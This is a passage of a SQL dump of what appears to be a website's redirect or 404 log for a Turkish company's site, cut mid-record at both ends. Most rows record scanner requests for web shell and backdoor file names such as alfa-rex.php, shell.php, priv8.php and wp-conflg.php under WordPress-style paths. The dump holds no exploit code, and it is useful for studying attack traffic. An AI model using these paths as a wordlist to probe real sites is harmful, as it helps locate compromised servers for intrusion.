00:00:00',301),(50295,'http://3s-technologies.com.tr/en/wp-includes/html-api/index.php',NULL,'https://www.google.fr/','',86,0,'2025-12-06 21:36:37','0000-00-00 00:00:00',301),(50296,'http://3s-technologies.com.tr/tr/tx1.php',NULL,'','',37,0,'2025-12-07 08:43:04','0000-00-00 00:00:00',301),(50297,'http://3s-technologies.com.tr/tr/x56.php',NULL,'','',29,0,'2025-12-07 08:43:06','0000-00-00 00:00:00',301),(50298,'http://3s-technologies.com.tr/tr/atx.php',NULL,'','',37,0,'2025-12-07 08:43:17','0000-00-00 00:00:00',301),(50299,'http://3s-technologies.com.tr/tr/ioxi-o1.php',NULL,'','',36,0,'2025-12-07 08:44:37','0000-00-00 00:00:00',301),(50300,'http://3s-technologies.com.tr/tr/juuuu.php',NULL,'','',33,0,'2025-12-07 08:44:38','0000-00-00 00:00:00',301),(50301,'http://3s-technologies.com.tr/tr/nox.php',NULL,'','',50,0,'2025-12-07 08:44:58','0000-00-00 00:00:00',301),(50302,'http://3s-technologies.com.tr/tr/la.php',NULL,'','',63,0,'2025-12-07 08:45:02','0000-00-00 00:00:00',301),(50303,'http://3s-technologies.com.tr/tr/ccou.php',NULL,'','',62,0,'2025-12-07 08:45:04','0000-00-00 00:00:00',301),(50304,'http://3s-technologies.com.tr/tr/xaz.php',NULL,'','',30,0,'2025-12-07 08:45:12','0000-00-00 00:00:00',301),(50305,'http://3s-technologies.com.tr/tr/up4.php',NULL,'','',34,0,'2025-12-07 08:45:13','0000-00-00 00:00:00',301),(50306,'http://3s-technologies.com.tr/tr/wtz.php',NULL,'','',30,0,'2025-12-07 08:45:16','0000-00-00 00:00:00',301),(50307,'http://3s-technologies.com.tr/tr/galex.php',NULL,'','',42,0,'2025-12-07 08:45:16','0000-00-00 00:00:00',301),(50308,'http://3s-technologies.com.tr/tr/xb.php',NULL,'','',38,0,'2025-12-07 08:45:17','0000-00-00 00:00:00',301),(50309,'http://3s-technologies.com.tr/tr/vx.php',NULL,'','',120,0,'2025-12-07 08:45:19','0000-00-00 00:00:00',301),(50310,'http://mail.3s-technologies.com.tr/tr/blurbs18.php',NULL,'','',3,0,'2025-12-07 22:25:03','0000-00-00 00:00:00',301),(50311,'http://mail.3s-technologies.com.tr/tr/file48.php',NULL,'','',33,0,'2025-12-07 22:25:04','0000-00-00 00:00:00',301),(50312,'http://mail.3s-technologies.com.tr/tr/ghh.php',NULL,'','',1,0,'2025-12-07 22:25:04','0000-00-00 00:00:00',301),(50313,'http://mail.3s-technologies.com.tr/tr/bb5.php',NULL,'','',1,0,'2025-12-07 22:25:05','0000-00-00 00:00:00',301),(50314,'http://mail.3s-technologies.com.tr/tr/ce.php',NULL,'','',1,0,'2025-12-07 22:25:05','0000-00-00 00:00:00',301),(50315,'http://mail.3s-technologies.com.tr/tr/sdm.php',NULL,'','',3,0,'2025-12-07 22:25:06','0000-00-00 00:00:00',301),(50316,'http://mail.3s-technologies.com.tr/tr/por.php',NULL,'','',1,0,'2025-12-07 22:25:06','0000-00-00 00:00:00',301),(50317,'http://mail.3s-technologies.com.tr/tr/nux.php',NULL,'','',1,0,'2025-12-07 22:25:07','0000-00-00 00:00:00',301),(50318,'http://mail.3s-technologies.com.tr/tr/iri.php',NULL,'','',1,0,'2025-12-07 22:25:07','0000-00-00 00:00:00',301),(50319,'http://mail.3s-technologies.com.tr/tr/85ohni.php',NULL,'','',1,0,'2025-12-07 22:25:08','0000-00-00 00:00:00',301),(50320,'http://mail.3s-technologies.com.tr/tr/tyasd.php',NULL,'','',1,0,'2025-12-07 22:25:10','0000-00-00 00:00:00',301),(50321,'http://mail.3s-technologies.com.tr/tr/wp-set.php',NULL,'','',1,0,'2025-12-07 22:25:10','0000-00-00 00:00:00',301),(50322,'http://mail.3s-technologies.com.tr/tr/amw.php',NULL,'','',1,0,'2025-12-07 22:25:11','0000-00-00 00:00:00',301),(50323,'http://mail.3s-technologies.com.tr/tr/waba.php',NULL,'','',1,0,'2025-12-07 22:25:12','0000-00-00 00:00:00',301),(50324,'http://mail.3s-technologies.com.tr/tr/styll.php',NULL,'','',9,0,'2025-12-07 22:25:13','0000-00-00 00:00:00',301),(50325,'http://mail.3s-technologies.com.tr/tr/gtc.php',NULL,'','',26,0,'2025-12-07 22:25:13','0000-00-00 00:00:00',301),(50326,'http://mail.3s-technologies.com.tr/tr/cheko.php',NULL,'','',1,0,'2025-12-07 22:25:14','0000-00-00 00:00:00',301),(50327,'http://mail.3s-technologies.com.tr/tr/xindex.php',NULL,'','',3,0,'2025-12-07 22:25:14','0000-00-00 00:00:00',301),(50328,'http://mail.3s-technologies.com.tr/tr/priv8.php',NULL,'','',5,0,'2025-12-07 22:25:15','0000-00-00 00:00:00',301),(50329,'http://mail.3s-technologies.com.tr/tr/t1.php',NULL,'','',1,0,'2025-12-07 22:25:16','0000-00-00 00:00:00',301),(50330,'http://mail.3s-technologies.com.tr/tr/sfcl.php',NULL,'','',1,0,'2025-12-07 22:25:17','0000-00-00 00:00:00',301),(50331,'http://mail.3s-technologies.com.tr/tr/oysdxc.php',NULL,'','',1,0,'2025-12-07 22:25:17','0000-00-00 00:00:00',301),(50332,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colors/sfcl.php',NULL,'','',1,0,'2025-12-07 22:25:18','0000-00-00 00:00:00',301),(50333,'http://mail.3s-technologies.com.tr/tr/flap.php',NULL,'','',1,0,'2025-12-07 22:25:18','0000-00-00 00:00:00',301),(50334,'http://mail.3s-technologies.com.tr/tr/ycc.php',NULL,'','',1,0,'2025-12-07 22:25:19','0000-00-00 00:00:00',301),(50335,'http://3s-technologies.com.tr/en/wp-content/themes/pridmag/install.phpu',NULL,'https://www.google.co.uk/','',1,0,'2025-12-09 03:10:14','0000-00-00 00:00:00',301),(50336,'http://3s-technologies.com.tr/en/wp-admin/admin-wolf.php',NULL,'https://www.bing.com/','',6,0,'2025-12-09 08:22:20','0000-00-00 00:00:00',301),(50337,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue',NULL,'https://www.google.com/','',76,0,'2025-12-09 08:22:24','0000-00-00 00:00:00',301),(50338,'http://3s-technologies.com.tr/en/wp-admin/images/about.php',NULL,'https://www.google.de/','',7,0,'2025-12-09 08:22:25','0000-00-00 00:00:00',301),(50339,'http://3s-technologies.com.tr/en/wp-admin/images/admin.php',NULL,'https://www.google.com/','',46,0,'2025-12-09 08:22:26','0000-00-00 00:00:00',301),(50340,'http://3s-technologies.com.tr/en/wp-admin/includes/wp-conflg.php',NULL,'https://www.google.co.uk/','',4,0,'2025-12-09 08:22:29','0000-00-00 00:00:00',301),(50341,'http://3s-technologies.com.tr/en/wp-admin/js/about.php7',NULL,'https://www.bing.com/','',8,0,'2025-12-09 08:22:30','0000-00-00 00:00:00',301),(50342,'http://3s-technologies.com.tr/en/wp-admin/js/admin.php',NULL,'https://www.google.fr/','',2,0,'2025-12-09 08:22:30','0000-00-00 00:00:00',301),(50343,'http://3s-technologies.com.tr/en/wp-admin/js/managert.php',NULL,'https://www.google.com/','',2,0,'2025-12-09 08:22:31','0000-00-00 00:00:00',301),(50344,'http://3s-technologies.com.tr/en/wp-admin/maint/nxc.php',NULL,'https://www.bing.com/','',2,0,'2025-12-09 08:22:33','0000-00-00 00:00:00',301),(50345,'http://3s-technologies.com.tr/en/wp-admin/maint/wp-damin.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-09 08:22:34','0000-00-00 00:00:00',301),(50346,'http://3s-technologies.com.tr/en/wp-admin/network/nxc.php',NULL,'https://www.google.com/','',2,0,'2025-12-09 08:22:36','0000-00-00 00:00:00',301),(50347,'http://3s-technologies.com.tr/en/wp-admin/nxc.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-09 08:22:37','0000-00-00 00:00:00',301),(50348,'http://3s-technologies.com.tr/en/wp-admin/user/about.php',NULL,'https://www.bing.com/','',4,0,'2025-12-09 08:22:38','0000-00-00 00:00:00',301),(50349,'http://3s-technologies.com.tr/en/wp-admin/user/index.php',NULL,'https://www.yahoo.com/','',4,0,'2025-12-09 08:22:39','0000-00-00 00:00:00',301),(50350,'http://3s-technologies.com.tr/en/wp-conflg/function.php',NULL,'https://www.google.fr/','',93,0,'2025-12-09 08:22:42','0000-00-00 00:00:00',301),(50351,'http://3s-technologies.com.tr/en/wp-content/admin-header.php',NULL,'https://www.google.co.uk/','',68,0,'2025-12-09 08:22:44','0000-00-00 00:00:00',301),(50352,'http://3s-technologies.com.tr/en/wp-content/autoload_classmap/function.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-09 08:22:46','0000-00-00 00:00:00',301),(50353,'http://3s-technologies.com.tr/en/wp-content/banners/about.php',NULL,'https://www.google.de/','',4,0,'2025-12-09 08:22:47','0000-00-00 00:00:00',301),(50354,'http://3s-technologies.com.tr/en/wp-content/chosen.php',NULL,'https://www.yahoo.com/','',4,0,'2025-12-09 08:22:47','0000-00-00 00:00:00',301),(50355,'http://3s-technologies.com.tr/en/wp-content/languages/about.php',NULL,'https://www.yahoo.com/','',4,0,'2025-12-09 08:22:50','0000-00-00 00:00:00',301),(50356,'http://3s-technologies.com.tr/en/wp-content/packed.php',NULL,'https://www.google.de/','',2,0,'2025-12-09 08:22:51','0000-00-00 00:00:00',301),(50357,'http://3s-technologies.com.tr/en/wp-content/plugins/iitespeed-cache',NULL,'https://www.bing.com/','',2,0,'2025-12-09 08:22:52','0000-00-00 00:00:00',301),(50358,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpresscore',NULL,'https://www.bing.com/','',7,0,'2025-12-09 08:22:53','0000-00-00 00:00:00',301),(50359,'http://3s-technologies.com.tr/en/wp-content/plugins/about.php',NULL,'https://duckduckgo.com/','',18,0,'2025-12-09 08:22:54','0000-00-00 00:00:00',301),(50360,'http://3s-technologies.com.tr/en/wp-content/plugins/mainhosting/default.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-09 08:22:57','0000-00-00 00:00:00',301),(50361,'http://3s-technologies.com.tr/en/wp-content/themes/nxc.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-09 08:23:02','0000-00-00 00:00:00',301),(50362,'http://3s-technologies.com.tr/en/wp-content/themes/pridmag/nxc.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-09 08:23:03','0000-00-00 00:00:00',301),(50363,'http://3s-technologies.com.tr/en/wp-content/themes/shorts.php',NULL,'https://www.google.com/','',2,0,'2025-12-09 08:23:04','0000-00-00 00:00:00',301),(50364,'http://3s-technologies.com.tr/en/wp-content/themes/too.php',NULL,'https://www.yahoo.com/','',4,0,'2025-12-09 08:23:04','0000-00-00 00:00:00',301),(50365,'http://3s-technologies.com.tr/en/wp-content/themes/twentytwenty/404.php',NULL,'https://www.google.de/','',2,0,'2025-12-09 08:23:06','0000-00-00 00:00:00',301),(50366,'http://3s-technologies.com.tr/en/wp-content/uploads/about.php',NULL,'https://www.google.fr/','',4,0,'2025-12-09 08:23:08','0000-00-00 00:00:00',301),(50367,'http://3s-technologies.com.tr/en/wp-content/uploads/wp-login.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-09 08:23:09','0000-00-00 00:00:00',301),(50368,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/admin.php',NULL,'https://www.bing.com/','',8,0,'2025-12-09 10:43:53','0000-00-00 00:00:00',301),(50369,'http://3s-technologies.com.tr/en/.well-known/server.php',NULL,'https://www.yahoo.com/','',6,0,'2025-12-09 10:43:54','0000-00-00 00:00:00',301),(50370,'http://3s-technologies.com.tr/en/about/function.php',NULL,'https://www.google.fr/','',23,0,'2025-12-09 10:44:01','0000-00-00 00:00:00',301),(50371,'http://3s-technologies.com.tr/en/admin/upload/css.php',NULL,'https://www.google.de/','',7,0,'2025-12-09 10:44:04','0000-00-00 00:00:00',301),(50372,'http://3s-technologies.com.tr/en/app.php',NULL,'https://www.google.co.uk/','',24,0,'2025-12-09 10:44:05','0000-00-00 00:00:00',301),(50373,'http://3s-technologies.com.tr/en/cord.php',NULL,'https://www.google.de/','',6,0,'2025-12-09 10:44:15','0000-00-00 00:00:00',301),(50374,'http://3s-technologies.com.tr/en/ee.php',NULL,'https://duckduckgo.com/','',25,0,'2025-12-09 10:44:18','0000-00-00 00:00:00',301),(50375,'http://3s-technologies.com.tr/en/fm.php',NULL,'https://www.google.fr/','',27,0,'2025-12-09 10:44:20','0000-00-00 00:00:00',301),(50376,'http://3s-technologies.com.tr/en/help.php',NULL,'https://duckduckgo.com/','',25,0,'2025-12-09 10:44:22','0000-00-00 00:00:00',301),(50377,'http://3s-technologies.com.tr/en/images/install.php',NULL,'https://www.google.com/','',71,0,'2025-12-09 10:44:24','0000-00-00 00:00:00',301),(50378,'http://3s-technologies.com.tr/en/images/nxc.php',NULL,'https://www.google.com/','',6,0,'2025-12-09 10:44:24','0000-00-00 00:00:00',301),(50379,'http://3s-technologies.com.tr/en/img/nxc.php',NULL,'https://www.bing.com/','',6,0,'2025-12-09 10:44:25','0000-00-00 00:00:00',301),(50380,'http://3s-technologies.com.tr/en/ioxi002.php7',NULL,'https://www.google.de/','',9,0,'2025-12-09 10:44:28','0000-00-00 00:00:00',301),(50381,'http://3s-technologies.com.tr/en/nxc.php',NULL,'https://www.yahoo.com/','',6,0,'2025-12-09 10:44:35','0000-00-00 00:00:00',301),(50382,'http://3s-technologies.com.tr/en/packed.php',NULL,'https://www.google.fr/','',9,0,'2025-12-09 10:44:35','0000-00-00 00:00:00',301),(50383,'http://3s-technologies.com.tr/en/upload/gpt-sh2.php',NULL,'https://duckduckgo.com/','',6,0,'2025-12-09 10:44:40','0000-00-00 00:00:00',301),(50384,'http://3s-technologies.com.tr/en/we.php',NULL,'https://www.google.co.uk/','',6,0,'2025-12-09 10:44:41','0000-00-00 00:00:00',301),(50385,'http://3s-technologies.com.tr/en/worksec.php',NULL,'https://www.google.com/','',7,0,'2025-12-09 10:44:42','0000-00-00 00:00:00',301),(50386,'http://3s-technologies.com.tr/tr/vbbn.php',NULL,'','',9,0,'2025-12-09 12:18:43','0000-00-00 00:00:00',301),(50387,'http://3s-technologies.com.tr/tr/fz.php',NULL,'','',11,0,'2025-12-09 12:18:44','0000-00-00 00:00:00',301),(50388,'http://3s-technologies.com.tr/tr/wl.php',NULL,'','',4,0,'2025-12-09 12:18:44','0000-00-00 00:00:00',301),(50389,'http://3s-technologies.com.tr/tr/sang.php',NULL,'','',9,0,'2025-12-09 12:18:45','0000-00-00 00:00:00',301),(50390,'http://3s-technologies.com.tr/tr/0o0.php',NULL,'','',10,0,'2025-12-09 12:18:46','0000-00-00 00:00:00',301),(50391,'http://3s-technologies.com.tr/tr/dbc.php',NULL,'','',5,0,'2025-12-09 12:18:47','0000-00-00 00:00:00',301),(50392,'http://3s-technologies.com.tr/tr/mh.php',NULL,'','',32,0,'2025-12-09 12:18:48','0000-00-00 00:00:00',301),(50393,'http://3s-technologies.com.tr/tr/11092null.php',NULL,'','',2,0,'2025-12-09 12:18:48','0000-00-00 00:00:00',301),(50394,'http://3s-technologies.com.tr/tr/12053null.php',NULL,'','',1,0,'2025-12-09 12:18:49','0000-00-00 00:00:00',301),(50395,'http://3s-technologies.com.tr/tr/mmm.php',NULL,'','',2,0,'2025-12-09 12:18:50','0000-00-00 00:00:00',301),(50396,'http://mail.3s-technologies.com.tr/tr/abe.php',NULL,'','',3,0,'2025-12-09 12:21:35','0000-00-00 00:00:00',301),(50397,'http://mail.3s-technologies.com.tr/tr/index1.php',NULL,'','',1,0,'2025-12-09 12:21:37','0000-00-00 00:00:00',301),(50398,'http://mail.3s-technologies.com.tr/tr/lock6.php',NULL,'','',1,0,'2025-12-09 12:21:38','0000-00-00 00:00:00',301),(50399,'http://mail.3s-technologies.com.tr/tr/news.php',NULL,'','',1,0,'2025-12-09 12:21:39','0000-00-00 00:00:00',301),(50400,'http://mail.3s-technologies.com.tr/tr/css/plugins.php',NULL,'','',1,0,'2025-12-09 12:21:41','0000-00-00 00:00:00',301),(50401,'http://mail.3s-technologies.com.tr/tr/wp-mail.php',NULL,'','',10,0,'2025-12-09 12:21:44','0000-00-00 00:00:00',301),(50402,'http://mail.3s-technologies.com.tr/tr/hoot.php',NULL,'','',1,0,'2025-12-09 12:21:53','0000-00-00 00:00:00',301),(50403,'http://mail.3s-technologies.com.tr/tr/wp-admin/admin.php',NULL,'','',2,0,'2025-12-09 12:21:59','0000-00-00 00:00:00',301),(50404,'http://mail.3s-technologies.com.tr/tr/geju.php',NULL,'','',2,0,'2025-12-09 12:21:59','0000-00-00 00:00:00',301),(50405,'http://mail.3s-technologies.com.tr/tr/contact.php',NULL,'','',4,0,'2025-12-09 12:22:02','0000-00-00 00:00:00',301),(50406,'http://mail.3s-technologies.com.tr/tr/shell20211028.php',NULL,'','',20,0,'2025-12-09 12:22:07','0000-00-00 00:00:00',301),(50407,'http://3s-technologies.com.tr/en/hmiqjdwe',NULL,'','',2,0,'2025-12-09 16:32:24','0000-00-00 00:00:00',301),(50408,'http://3s-technologies.com.tr/en/hmiqjdwe',NULL,'','',1,0,'2025-12-09 16:32:24','0000-00-00 00:00:00',301),(50409,'https://3s-technologies.com.tr/en/fmrstnzb',NULL,'','',3,0,'2025-12-09 16:32:24','0000-00-00 00:00:00',301),(50410,'http://3s-technologies.com.tr/en/vhdraqlk',NULL,'','',3,0,'2025-12-09 16:32:38','0000-00-00 00:00:00',301),(50411,'https://3s-technologies.com.tr/en/viklnayx',NULL,'','',1,0,'2025-12-09 16:32:40','0000-00-00 00:00:00',301),(50412,'https://3s-technologies.com.tr/en/viklnayx',NULL,'','',1,0,'2025-12-09 16:32:40','0000-00-00 00:00:00',301),(50413,'https://3s-technologies.com.tr/en/viklnayx',NULL,'','',1,0,'2025-12-09 16:32:40','0000-00-00 00:00:00',301),(50414,'http://3s-technologies.com.tr/tr/cart.php',NULL,'','',5,0,'2025-12-10 03:49:40','0000-00-00 00:00:00',301),(50415,'http://3s-technologies.com.tr/tr/compare.php',NULL,'','',5,0,'2025-12-10 03:49:41','0000-00-00 00:00:00',301),(50416,'http://3s-technologies.com.tr/tr/atom.php',NULL,'','',5,0,'2025-12-10 03:49:45','0000-00-00 00:00:00',301),(50417,'http://3s-technologies.com.tr/tr/case.php',NULL,'','',6,0,'2025-12-10 03:49:46','0000-00-00 00:00:00',301),(50418,'http://3s-technologies.com.tr/tr/docs.php',NULL,'','',10,0,'2025-12-10 03:49:47','0000-00-00 00:00:00',301),(50419,'http://3s-technologies.com.tr/tr/ios.php',NULL,'','',6,0,'2025-12-10 03:49:48','0000-00-00 00:00:00',301),(50420,'http://3s-technologies.com.tr/en/images/urunler/t_mi300.jpg',NULL,'http://3s-technologies.com.tr/en/products-en/dalga-lehim/mi-300-detail','',9,0,'2025-12-10 08:45:27','0000-00-00 00:00:00',301),(50421,'http://3s-technologies.com.tr/en/uploads/index.php',NULL,'https://www.google.com/','',53,0,'2025-12-10 19:18:55','0000-00-00 00:00:00',301),(50422,'http://3s-technologies.com.tr/en/wp-includes/blocks/code',NULL,'https://www.google.fr/','',44,0,'2025-12-10 22:14:07','0000-00-00 00:00:00',301),(50423,'http://3s-technologies.com.tr/en/wp-includes/js/dist',NULL,'https://www.yahoo.com/','',69,0,'2025-12-10 22:14:16','0000-00-00 00:00:00',301),(50424,'http://3s-technologies.com.tr/en/wp-includes/js/dist/development',NULL,'https://www.bing.com/','',51,0,'2025-12-10 22:14:17','0000-00-00 00:00:00',301),(50425,'http://3s-technologies.com.tr/en/wp-includes/pomo/index.php',NULL,'https://duckduckgo.com/','',58,0,'2025-12-10 22:14:19','0000-00-00 00:00:00',301),(50426,'http://mail.3s-technologies.com.tr/tr/admin/uploads/lv.php',NULL,'','',1,0,'2025-12-11 14:12:45','0000-00-00 00:00:00',301),(50427,'http://mail.3s-technologies.com.tr/tr/wp-includes/wp-includes/about.php',NULL,'','',1,0,'2025-12-11 14:12:46','0000-00-00 00:00:00',301),(50428,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/wp-pridmag/lock.php',NULL,'','',1,0,'2025-12-11 14:12:46','0000-00-00 00:00:00',301),(50429,'http://mail.3s-technologies.com.tr/tr/admin/uploads/media.php',NULL,'','',1,0,'2025-12-11 14:12:49','0000-00-00 00:00:00',301),(50430,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/about.php',NULL,'','',1,0,'2025-12-11 14:12:51','0000-00-00 00:00:00',301),(50431,'http://mail.3s-technologies.com.tr/tr/browse.php',NULL,'','',3,0,'2025-12-11 14:12:52','0000-00-00 00:00:00',301),(50432,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/twenty/twenty.php',NULL,'','',1,0,'2025-12-11 14:12:53','0000-00-00 00:00:00',301),(50433,'http://mail.3s-technologies.com.tr/tr/index/lock.php',NULL,'','',7,0,'2025-12-11 14:12:55','0000-00-00 00:00:00',301),(50434,'http://mail.3s-technologies.com.tr/tr/wp-content/config.php',NULL,'','',7,0,'2025-12-11 14:12:58','0000-00-00 00:00:00',301),(50435,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colors/index.php',NULL,'','',15,0,'2025-12-11 14:13:01','0000-00-00 00:00:00',301),(50436,'http://mail.3s-technologies.com.tr/tr/css/chosen.php',NULL,'','',15,0,'2025-12-11 14:13:02','0000-00-00 00:00:00',301),(50437,'http://mail.3s-technologies.com.tr/tr/wp-includes/requests/utility/cc.php',NULL,'','',7,0,'2025-12-11 14:13:03','0000-00-00 00:00:00',301),(50438,'http://mail.3s-technologies.com.tr/tr/wp-includes/text/index.php',NULL,'','',9,0,'2025-12-11 14:13:04','0000-00-00 00:00:00',301),(50439,'http://mail.3s-technologies.com.tr/tr/packed.php',NULL,'','',14,0,'2025-12-11 14:13:05','0000-00-00 00:00:00',301),(50440,'http://mail.3s-technologies.com.tr/tr/wp-admin/update.php',NULL,'','',7,0,'2025-12-11 14:13:05','0000-00-00 00:00:00',301),(50441,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/astra/inc/fm.php',NULL,'','',7,0,'2025-12-11 14:13:06','0000-00-00 00:00:00',301),(50442,'http://mail.3s-technologies.com.tr/tr/wp-content/mu-plugins/gecko.php',NULL,'','',7,0,'2025-12-11 14:13:08','0000-00-00 00:00:00',301),(50443,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colors/blue/moon.php',NULL,'','',1,0,'2025-12-11 14:13:14','0000-00-00 00:00:00',301),(50444,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/wp-pridmag/up.php',NULL,'','',1,0,'2025-12-11 14:13:14','0000-00-00 00:00:00',301),(50445,'http://mail.3s-technologies.com.tr/tr/wp-includes/html-api/alfa-rex.php',NULL,'','',1,0,'2025-12-11 14:13:15','0000-00-00 00:00:00',301),(50446,'http://mail.3s-technologies.com.tr/tr/wp-content/upgrade-temp-backup/about.php',NULL,'','',7,0,'2025-12-11 14:13:16','0000-00-00 00:00:00',301),(50447,'http://mail.3s-technologies.com.tr/tr/wp-admin/includes/m.php',NULL,'','',1,0,'2025-12-11 14:13:17','0000-00-00 00:00:00',301),(50448,'http://mail.3s-technologies.com.tr/tr/images/admin.php',NULL,'','',2,0,'2025-12-11 14:13:18','0000-00-00 00:00:00',301),(50449,'http://mail.3s-technologies.com.tr/tr/admin/fckeditor/editor/filemanager/alfanew.php',NULL,'','',1,0,'2025-12-11 14:13:19','0000-00-00 00:00:00',301),(50450,'http://mail.3s-technologies.com.tr/tr/wp-admin/user/admin.php',NULL,'','',1,0,'2025-12-11 14:13:20','0000-00-00 00:00:00',301),(50451,'http://mail.3s-technologies.com.tr/tr/wp-includes/ixr/shell.php',NULL,'','',1,0,'2025-12-11 14:13:20','0000-00-00 00:00:00',301),(50452,'http://mail.3s-technologies.com.tr/tr/wp-content/content.php',NULL,'','',1,0,'2025-12-11 14:13:22','0000-00-00 00:00:00',301),(50453,'http://mail.3s-technologies.com.tr/tr/wp-includes/requests/utility/alfa-rex.php',NULL,'','',1,0,'2025-12-11 14:13:24','0000-00-00 00:00:00',301),(50454,'http://mail.3s-technologies.com.tr/tr/wp-content/upgrade-temp-backup/ty.php',NULL,'','',1,0,'2025-12-11 14:13:25','0000-00-00 00:00:00',301),(50455,'http://mail.3s-technologies.com.tr/tr/.well-known/content.php',NULL,'','',5,0,'2025-12-11 14:13:25','0000-00-00 00:00:00',301),(50456,'http://mail.3s-technologies.com.tr/tr/index/index.php',NULL,'','',1,0,'2025-12-11 14:13:26','0000-00-00 00:00:00',301),(50457,'http://mail.3s-technologies.com.tr/tr/include/wp-configs.php',NULL,'','',1,0,'2025-12-11 14:13:28','0000-00-00 00:00:00',301),(50458,'http://mail.3s-technologies.com.tr/tr/wp-admin/js/chosen.php',NULL,'','',1,0,'2025-12-11 14:13:29','0000-00-00 00:00:00',301),(50459,'http://mail.3s-technologies.com.tr/tr/wp-includes/sodium_compat/alfa-rex.php',NULL,'','',1,0,'2025-12-11 14:13:30','0000-00-00 00:00:00',301),(50460,'http://mail.3s-technologies.com.tr/tr/bg/xmrlpc.php',NULL,'','',1,0,'2025-12-11 14:13:31','0000-00-00 00:00:00',301),(50461,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/core-plugin/file-manager.php',NULL,'','',1,0,'2025-12-11 14:13:32','0000-00-00 00:00:00',301),(50462,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/423_index.php',NULL,'','',1,0,'2025-12-11 14:13:33','0000-00-00 00:00:00',301),(50463,'http://mail.3s-technologies.com.tr/tr/wp-admin/byp.php',NULL,'','',1,0,'2025-12-11 14:13:36','0000-00-00 00:00:00',301),(50464,'http://mail.3s-technologies.com.tr/tr/wp-includes/theme-compat/index.php',NULL,'','',1,0,'2025-12-11 14:13:37','0000-00-00 00:00:00',301),(50465,'http://mail.3s-technologies.com.tr/tr/admin/editor/engine.php',NULL,'','',1,0,'2025-12-11 14:13:38','0000-00-00 00:00:00',301),(50466,'http://mail.3s-technologies.com.tr/tr/wp-includes/images/smilies/index.php',NULL,'','',9,0,'2025-12-11 14:13:40','0000-00-00 00:00:00',301),(50467,'http://mail.3s-technologies.com.tr/tr/wp-includes/html-api/about.php',NULL,'','',7,0,'2025-12-11 14:13:42','0000-00-00 00:00:00',301),(50468,'http://mail.3s-technologies.com.tr/tr/wp-includes/images/smilies/about.php',NULL,'','',8,0,'2025-12-11 14:13:43','0000-00-00 00:00:00',301),(50469,'http://mail.3s-technologies.com.tr/tr/assets/plugins/jquery-file-upload/server/php/include.php',NULL,'','',1,0,'2025-12-11 14:13:44','0000-00-00 00:00:00',301),(50470,'http://mail.3s-technologies.com.tr/tr/images/lmfi2.php',NULL,'','',12,0,'2025-12-11 14:13:45','0000-00-00 00:00:00',301),(50471,'http://mail.3s-technologies.com.tr/tr/wp-includes/text/diff/alfa-rex.php',NULL,'','',11,0,'2025-12-11 14:13:47','0000-00-00 00:00:00',301),(50472,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/seotheme/classwithtostring.php',NULL,'','',1,0,'2025-12-11 14:13:52','0000-00-00 00:00:00',301),(50473,'http://mail.3s-technologies.com.tr/tr/wp-includes/widgets/parx.php',NULL,'','',1,0,'2025-12-11 14:13:53','0000-00-00 00:00:00',301),(50474,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/cache/footer.php',NULL,'','',1,0,'2025-12-11 14:13:53','0000-00-00 00:00:00',301),(50475,'http://mail.3s-technologies.com.tr/tr/wp-includes/css/wp-conflg.php',NULL,'','',1,0,'2025-12-11 14:13:55','0000-00-00 00:00:00',301),(50476,'http://mail.3s-technologies.com.tr/tr/wp-includes/html-api/chosen.php',NULL,'','',1,0,'2025-12-11 14:13:57','0000-00-00 00:00:00',301),(50477,'http://mail.3s-technologies.com.tr/tr/wp-admin/includes/cong.php',NULL,'','',1,0,'2025-12-11 14:13:57','0000-00-00 00:00:00',301),(50478,'http://mail.3s-technologies.com.tr/tr/wp-admin/network/shell.php',NULL,'','',1,0,'2025-12-11 14:13:58','0000-00-00 00:00:00',301),(50479,'http://mail.3s-technologies.com.tr/tr/wp-includes/images/smilies/wp-login.php',NULL,'','',1,0,'2025-12-11 14:13:59','0000-00-00 00:00:00',301),(50480,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colors/blue/lock.php',NULL,'','',1,0,'2025-12-11 14:14:03','0000-00-00 00:00:00',301),(50481,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/pwnd/classwithtostring.php',NULL,'','',1,0,'2025-12-11 14:14:04','0000-00-00 00:00:00',301),(50482,'http://mail.3s-technologies.com.tr/tr/wp-includes/text/diff/renderer/about.php',NULL,'','',1,0,'2025-12-11 14:14:04','0000-00-00 00:00:00',301),(50483,'http://mail.3s-technologies.com.tr/tr/.well-known/cache-compat.php',NULL,'','',1,0,'2025-12-11 14:14:07','0000-00-00 00:00:00',301),(50484,'http://mail.3s-technologies.com.tr/tr/wp-includes/php-compat/content.php',NULL,'','',1,0,'2025-12-11 14:14:09','0000-00-00 00:00:00',301),(50485,'http://3s-technologies.com.tr/tr/xse25.php',NULL,'','',8,0,'2025-12-11 14:26:35','0000-00-00 00:00:00',301),(50486,'http://3s-technologies.com.tr/tr/wp-includes/customize/sx.php',NULL,'','',1,0,'2025-12-11 14:26:36','0000-00-00 00:00:00',301),(50487,'http://3s-technologies.com.tr/tr/shoyo.php',NULL,'','',13,0,'2025-12-11 14:26:42','0000-00-00 00:00:00',301),(50488,'http://3s-technologies.com.tr/tr/loads.php',NULL,'','',4,0,'2025-12-11 14:51:28','0000-00-00 00:00:00',301),(50489,'http://3s-technologies.com.tr/tr/mj.php',NULL,'','',1,0,'2025-12-11 14:51:29','0000-00-00 